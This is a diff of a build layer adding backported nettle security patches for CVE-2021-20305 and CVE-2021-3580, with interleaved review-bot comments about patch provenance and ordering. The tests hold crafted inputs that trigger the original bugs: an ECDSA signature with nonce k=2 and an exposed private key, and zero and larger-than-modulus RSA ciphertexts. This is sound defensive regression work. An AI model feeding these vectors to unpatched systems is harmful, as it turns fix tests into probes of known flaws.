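+- ecc_mod_mul (p, t0, x1, z2);
+- if (mpn_cmp (t0, p->m, p->size) >= 0)
+- mpn_sub_n (t0, t0, p->m, p->size);
+-
+- ecc_mod_mul (p, t1, x2, z1);
+- if (mpn_cmp (t1, p->m, p->size) >= 0)
+- mpn_sub_n (t1, t1, p->m, p->size);
++ ecc_mod_mul_canonical (p, t0, x1, z2, t0);
++ ecc_mod_mul_canonical (p, t1, x2, z1, t1);
+
+ return mpn_cmp (t0, t1, p->size) == 0;
+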
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
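--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 15:19:19 +0100
+Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
+
+* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+to compute the scalars used for ecc multiplication.
+* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+triggers an assert on 64-bit platforms, without above fix.
+* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+the same signature.
+
+(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
+CVE: CVE-2021-20305 dep3
+[Minor fixup on _nettle_secp_224r1]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ ecc-ecdsa-verify.c | 4 ++--
+ testsuite/ecdsa-sign-test.c | 13 +++++++++++++
+ testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
+ 4 files changed, 44 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 2a9217a6..63848f53 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,7 +1,15 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+#+ to compute the scalars used for ecc multiplication.
+#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+#+ triggers an assert on 64-bit platforms, without above fix.
+#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating
+#+ the same signature.
+#+
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/ecc-ecdsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
++++ nettle-3.5.1/ecc-ecdsa-verify.c
+@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
+
+ /* u1 = h / s, P1 = u1 * G */
+ ecc_hash (&ecc->q, hp, length, digest);
+- ecc_modq_mul (ecc, u1, hp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
+
+ /* u2 = r / s, P2 = u2 * Y */
+- ecc_modq_mul (ecc, u2, rp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
+
+ /* Total storage: 5*ecc->p.size + ecc->mul_itch */
+ ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
+Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
+@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Producing the signature for corresponding test in
++ ecdsa-verify-test.c, with special u1 and u2. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "99b5b787484def12894ca507058b3bf5"
++ "43d72d82fa7721d2e805e5e6",
++ "2",
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* Test cases for the smaller groups, verified with a
+ proof-of-concept implementation done for Yubico AB. */
+ test_ecdsa (&_nettle_secp_192r1,
+Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
+@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Corresponds to nonce k = 2 and private key z =
++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
++ hash are chosen so that intermediate scalars in the verify
++ equations are u1 = 0x6b245680e700, u2 =
++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical
++ reduction of the scalars. Bug caused by missing canonical
++ reduction reported by Guido Vranken. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "9e7e6cc6b1bdfa8ee039b66ad85e5490"
++ "7be706a900a3cba1c8fdd014", /* x */
++ "74855db3f7c1b4097ae095745fc915e3"
++ "8a79d2a1de28f282eafb22ba", /* y */
++
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* From RFC 4754 */
+ test_ecdsa (&_nettle_secp_256r1,
+ "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"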
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
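--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
+Backport of:
+
+From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:27:50 +0100
+Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
+
+* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+canonical range.
+
+(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
+CVE: CVE-2021-20305 dep4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ ecc-ecdsa-sign.c | 3 +--
+ 2 files changed, 4 insertions(+), 2 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 63848f53..fb2d7f66 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+#+ canonical range.
+#+
+# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+# * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+--- a/ecc-ecdsa-sign.c
++++ b/ecc-ecdsa-sign.c
+@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
+
+ ecc_modq_mul (ecc, tp, zp, rp);
+ ecc_modq_add (ecc, hp, hp, tp);
+- ecc_modq_mul (ecc, tp, hp, kinv);
++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
+
+- mpn_copyi (sp, tp, ecc->p.size);
+ #undef P
+ #undef hp
+ #undef kinv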
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
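--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:42:21 +0100
+Subject: [PATCH] Similar fix for eddsa.
+
+* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+reduced. Two of the three call sites need that.
+
+(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
+
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
+CVE: CVE-2021-20305
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ eddsa-hash.c | 10 +++++++---
+ 2 files changed, 10 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5f8a22c2..ce330831 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+#+ reduced. Two of the three call sites need that.
+#+
+# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+#
+Index: nettle-3.5.1/eddsa-hash.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-hash.c
++++ nettle-3.5.1/eddsa-hash.c
+@@ -46,7 +46,12 @@ void
+ _eddsa_hash (const struct ecc_modulo *m,
+ mp_limb_t *rp, const uint8_t *digest)
+ {
++ mp_limb_t cy;
+ size_t nbytes = 1 + m->bit_size / 8;
+ mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
+ m->mod (m, rp);
++ mpn_copyi (rp + m->size, rp, m->size);
++ /* Ensure canonical reduction. */
++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, rp + m->size, m->size);
+ }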
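Review bot: The provenance header of this patch does not match the file it sits in: `Upstream-Status` cites Debian's `CVE-2021-20305-6.patch` while the file is CVE-2021-20305-5.patch, and the `CVE:` line drops the `depN` suffix that patches 1–4 carry. The commented-out ChangeLog context also refers to ecc-gostdsa-verify.c, which suggests (not confirmable from this page) that one patch of the source series was deliberately left out of the backport. A header line stating that, for example `[Debian CVE-2021-20305-5.patch omitted: <reason>]`, would let an auditor confirm that the carried series is complete for this CVE rather than having to diff it against the Debian tree.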
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
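--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
+From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:31:39 +0200
+Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
+
+Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
+
+(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 17 +++++++++-
+ rsa-decrypt-tr.c | 7 ++---
+ rsa-internal.h | 4 +--
+ rsa-sec-decrypt.c | 9 ++++--
+ rsa-sign-tr.c | 61 +++++++++++++++++-------------------
+ testsuite/rsa-encrypt-test.c | 14 ++++++++-
+ 6 files changed, 69 insertions(+), 43 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+ TMP_GMP_ALLOC (em, key->size);
++ mpz_limbs_copy(m, gibberish, key_limb_size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, key_limb_size);
+
+Index: nettle-3.5.1/rsa-internal.h
+===================================================================
+--- nettle-3.5.1.orig/rsa-internal.h
++++ nettle-3.5.1/rsa-internal.h
+@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
+ mp_limb_t *scratch);
+
+ /* Safe side-channel silent variant, using RSA blinding, and checking the
+- * result after CRT. */
++ * result after CRT. In-place calls, with x == m, is allowed. */
+ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn);
++ mp_limb_t *x, const mp_limb_t *m);
+
+ #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ /* We need a copy because m can be shorter than key_size,
++ * but _rsa_sec_compute_root_tr expect all inputs to be
++ * normalized to a key_size long buffer length */
++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
++
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
+
+Index: nettle-3.5.1/rsa-sign-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sign-tr.c
++++ nettle-3.5.1/rsa-sign-tr.c
+@@ -131,35 +131,34 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
++ mp_size_t nn;
+ mpz_t mz;
+ mpz_t xz;
+ int res;
+
+- mpz_init(mz);
+ mpz_init(xz);
+
+- mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
+- mpz_limbs_finish(mz, mn);
++ nn = mpz_size (pub->n);
+
+- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
++ mpz_roinit_n(mz, m, nn));
+
+ if (res)
+- mpz_limbs_copy(x, xz, mpz_size(pub->n));
++ mpz_limbs_copy(x, xz, nn);
+
+- mpz_clear(mz);
+ mpz_clear(xz);
+ return res;
+ }
+ #else
+ /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
+- returns the inverse (ri), for use by rsa_unblind. */
++ returns the inverse (ri), for use by rsa_unblind. Must have c != m,
++ no in-place operation.*/
+ static void
+ rsa_sec_blind (const struct rsa_public_key *pub,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
+- mp_size_t mn)
++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
+ {
+ const mp_limb_t *ep = mpz_limbs_read (pub->e);
+ const mp_limb_t *np = mpz_limbs_read (pub->n);
+@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
+
+ /* c = m*(r^e) mod n */
+ itch = mpn_sec_powm_itch(nn, ebn, nn);
+- i2 = mpn_sec_mul_itch(nn, mn);
++ i2 = mpn_sec_mul_itch(nn, nn);
+ itch = MAX(itch, i2);
+- i2 = mpn_sec_div_r_itch(nn + mn, nn);
++ i2 = mpn_sec_div_r_itch(2*nn, nn);
+ itch = MAX(itch, i2);
+ i2 = mpn_sec_invert_itch(nn);
+ itch = MAX(itch, i2);
+
+- TMP_GMP_ALLOC (tp, nn + mn + itch);
+- scratch = tp + nn + mn;
++ TMP_GMP_ALLOC (tp, 2*nn + itch);
++ scratch = tp + 2*nn;
+
+ /* ri = r^(-1) */
+ do
+@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
+ while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
+
+ mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
+- /* normally mn == nn, but m can be smaller in some cases */
+- mpn_sec_mul (tp, c, nn, m, mn, scratch);
+- mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
++ mpn_sec_mul (tp, c, nn, m, nn, scratch);
++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
+ mpn_copyi(c, tp, nn);
+
+ TMP_GMP_FREE (r);
+@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
+ TMP_GMP_FREE (tp);
+ }
+
+-/* m = c ri mod n */
++/* m = c ri mod n. Allows x == c. */
+ static void
+ rsa_sec_unblind (const struct rsa_public_key *pub,
+ mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
+@@ -299,7 +297,7 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
+ TMP_GMP_DECL (c, mp_limb_t);
+ TMP_GMP_DECL (ri, mp_limb_t);
+@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
+ size_t key_limb_size;
+ int ret;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
+ key is invalid and rejected by rsa_private_key_prepare. However,
+@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
+ }
+
+ assert(mpz_size(pub->n) == key_limb_size);
+- assert(mn <= key_limb_size);
+
+ TMP_GMP_ALLOC (c, key_limb_size);
+ TMP_GMP_ALLOC (ri, key_limb_size);
+ TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
+
+- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
++ rsa_sec_blind (pub, random_ctx, random, c, ri, m);
+
+- _rsa_sec_compute_root(key, c, x, scratch);
++ _rsa_sec_compute_root(key, x, c, scratch);
+
+- ret = rsa_sec_check_root(pub, c, x);
++ ret = rsa_sec_check_root(pub, x, c);
+
+- rsa_sec_unblind(pub, x, ri, c);
++ rsa_sec_unblind(pub, x, ri, x);
+
+ cnd_mpn_zero(1 - ret, x, key_limb_size);
+
+@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
+ mpz_t x, const mpz_t m)
+ {
+ TMP_GMP_DECL (l, mp_limb_t);
++ mp_size_t nn = mpz_size(pub->n);
+ int res;
+
+- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
+- TMP_GMP_ALLOC (l, l_size);
++ TMP_GMP_ALLOC (l, nn);
++ mpz_limbs_copy(l, m, nn);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
+- mpz_limbs_read(m), mpz_size(m));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
+ if (res) {
+- mp_limb_t *xp = mpz_limbs_write (x, l_size);
+- mpn_copyi (xp, l, l_size);
+- mpz_limbs_finish (x, l_size);
++ mp_limb_t *xp = mpz_limbs_write (x, nn);
++ mpn_copyi (xp, l, nn);
++ mpz_limbs_finish (x, nn);
+ }
+
+ TMP_GMP_FREE (l);
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,6 +19,7 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
++ mpz_t zero;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+@@ -101,6 +102,17 @@ test_main(void)
+ ASSERT(decrypted[decrypted_length] == after);
+ ASSERT(decrypted[0] == 'A');
+
++ /* Test zero input. */
++ mpz_init_set_ui (zero, 0);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, zero));
++ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+ mpz_add_ui (key.q, key.q, 2);
+@@ -112,6 +124,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
++ mpz_clear(zero);
+ free(decrypted);
+ }
+-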
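Review bot: After this patch `rsa_decrypt_tr` and `rsa_sec_decrypt` copy `gibberish` into a buffer of `mpz_size(pub->n)` limbs with `mpz_limbs_copy` before anything has bounded the input, and the removed `assert(mn <= key_limb_size)` gets no replacement here. The range check `mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0` only arrives with CVE-2021-3580_2.patch, so the two files are safe only when applied together and in this order; the header's `dep#1` hints at that, but a sentence stating the dependency outright (and an `Upstream-Status` URL like the other nettle patches carry) would make it auditable. Separately, in the second `_rsa_sec_compute_root_tr` the retained `assert(mpz_size(pub->n) == key_limb_size);` is now always true, because `key_limb_size` is assigned from `mpz_size(pub->n)` a few lines earlier, and could be dropped. Both functions extend beyond the hunks shown.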
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
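--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
@@ -0,0 +1,163 @@
+From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:32:38 +0200
+Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
+
+(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ rsa-decrypt-tr.c | 4 ++++
+ rsa-decrypt.c | 10 ++++++++++
+ rsa-sec-decrypt.c | 4 ++++
+ rsa.h | 5 +++--
+ testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
+ 6 files changed, 62 insertions(+), 9 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+Index: nettle-3.5.1/rsa-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt.c
++++ nettle-3.5.1/rsa-decrypt.c
+@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
+ int res;
+
+ mpz_init(m);
++
++ /* First check that input is in range. Since we don't have the
++ public key available here, we need to reconstruct n. */
++ mpz_mul (m, key->p, key->q);
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
++ {
++ mpz_clear (m);
++ return 0;
++ }
++
+ rsa_compute_root(key, m, gibberish);
+
+ res = pkcs1_decrypt (key->size, m, length, message);
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_DECL (em, uint8_t);
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+Index: nettle-3.5.1/rsa.h
+===================================================================
+--- nettle-3.5.1.orig/rsa.h
++++ nettle-3.5.1/rsa.h
+@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
+ size_t length, uint8_t *message,
+ const mpz_t gibberish);
+
+-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
++/* Compute x, the e:th root of m. Calling it with x == m is allowed.
++ It is required that 0 <= m < n. */
+ void
+ rsa_compute_root(const struct rsa_private_key *key,
+ mpz_t x, const mpz_t m);
+
+ /* Safer variant, using RSA blinding, and checking the result after
+- CRT. */
++ CRT. It is required that 0 <= m < n. */
+ int
+ rsa_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,11 +19,12 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
+- mpz_t zero;
++ mpz_t bad_input;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+ mpz_init(gibberish);
++ mpz_init(bad_input);
+
+ knuth_lfib_init(&lfib, 17);
+
+@@ -103,15 +104,40 @@ test_main(void)
+ ASSERT(decrypted[0] == 'A');
+
+ /* Test zero input. */
+- mpz_init_set_ui (zero, 0);
++ mpz_set_ui (bad_input, 0);
+ decrypted_length = msg_length;
+- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_decrypt_tr(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- &decrypted_length, decrypted, zero));
++ &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_sec_decrypt(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- decrypted_length, decrypted, zero));
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is slightly larger than n */
++ mpz_add(bad_input, gibberish, pub.n);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is considerably larger than n */
++ mpz_mul_2exp (bad_input, pub.n, 100);
++ mpz_add (bad_input, bad_input, gibberish);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
+ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+@@ -124,6 +150,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
+- mpz_clear(zero);
++ mpz_clear(bad_input);
+ free(decrypted);
+ }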
